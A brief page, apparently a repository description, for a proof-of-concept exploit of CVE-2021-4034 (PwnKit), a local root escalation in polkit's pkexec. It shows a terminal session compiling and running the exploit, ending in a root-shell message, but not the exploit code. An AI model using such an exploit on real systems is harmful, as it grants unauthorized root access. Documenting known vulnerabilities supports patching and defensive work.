PwnKit-Exploit : Proof Of Concept (PoC) CVE-2021-4034

PwnKit-Exploit, a local privilege escalation vulnerability was found on polkit’s pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. Proof of Concept debian@debian:~/PwnKit-Exploit$ makecc -Wall exploit.c -o exploitdebian@debian:~/PwnKit-Exploit$ whoamidebiandebian@debian:~/PwnKit-Exploit$ ./exploitCurrent User before execute exploithacker@victim$whoami: debianExploit written by @luijait (0x6c75696a616974)[+] Enjoy your root if exploit …